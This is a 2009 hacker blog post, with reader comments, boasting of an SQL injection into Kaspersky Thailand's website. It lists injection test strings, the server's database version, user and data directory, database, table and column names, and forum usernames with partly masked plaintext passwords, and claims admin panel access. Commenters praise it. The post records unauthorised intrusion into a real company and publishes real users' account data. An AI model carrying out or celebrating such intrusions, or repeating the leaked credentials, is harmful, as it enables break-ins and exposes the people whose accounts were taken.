Kaspersky Thailand Full Access

December 10th, 2009 TinKode Posted in MySQL Injection | 10 Comments »


 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/        

                     #Kaspersky Thailand full access@c0de.breaker

Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.

Testing:

and 1=1– (False)

and 1=2– (True)

Main Informations:

#Version: 5.1.30
#User:thaikasp_forum@localhost
#Principal Database:thaikasp_dealer
#Datadir:/var/lib/mysql/

All databases:

#information_schema
#thaikasp_dealer
#thaikasp_forum

Tables from thaikasp_dealer:

#bkkplace
#newheader
#tb_dealer
#tb_part

Tables from thaikasp_forum:

#forum
#tbmember

Columns from tbmember

#ID
#Username
#Password

And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#tomsound:b_v***
#anukool:kas*****
#kaspersky2009:w***
#gm8kaspe*****

Admin Control Panel:

Yeah, finish.
Bye, TinKode

10 Responses to “Kaspersky Thailand Full Access”

  1. Kerny Says:
    December 11th, 2009 at 11:45

    ??????, ??? ????? ???????? ??????????….

  2. TinKode Says:
    December 11th, 2009 at 14:35

    Yeah! :) Please, next time speak in english! :)

  3. h00kman Says:
    December 11th, 2009 at 17:53

    Respect man:) Hope they’ll correct there stuff)

  4. gsadgads Says:
    December 12th, 2009 at 21:14

    so what was the problem with mod_security and how did you bypassed it?

  5. Edwas Says:
    December 12th, 2009 at 21:21

    Hello,
    Super post, Need to mark it on Digg
    Have a nice day
    Edwas

  6. hexon Says:
    December 14th, 2009 at 11:43

    nice hack dude , i didn’t managed to bypass mod_security=on :(

  7. alexandra Says:
    December 15th, 2009 at 02:53

    Ia uitati-va aici pe blogul asta sa vedeti cate site-uri a spart baiatu ala http://ovi...
    da-ti add la id meu si spuneti mi cum reuseste sa la sparga ca-s tare curioasa :P

  8. TinKode Says:
    December 15th, 2009 at 03:06

    Data viitoare nu m-ai face spam.
    Nu intereseaza pe nimeni ca sparge un site uitat de lume gasit la intamplare cu dork-uri.

  9. Kaspersky kolejn? ofiar? c0de.breakera | Komputery Says:
    December 15th, 2009 at 09:55

    [...] agencji NASA (National Aeronautics and Space Administration). Dzi? natomiast, rumu?ski haker opublikowa? na swej stronie internetowej szczegó?owe informacje dotycz?ce w?amania do serwisu firmy [...]

  10. » Apple.com podatne na atak Blind SQLi -- Niebezpiecznik.pl -- Says:
    December 28th, 2009 at 16:15

    [...] który na swoim koncie ma wykrycie luk w serwisach NASA i ca?kowity dost?p do baz danych Kaspersky’ego, wczoraj dobra? si? do serwisu [...]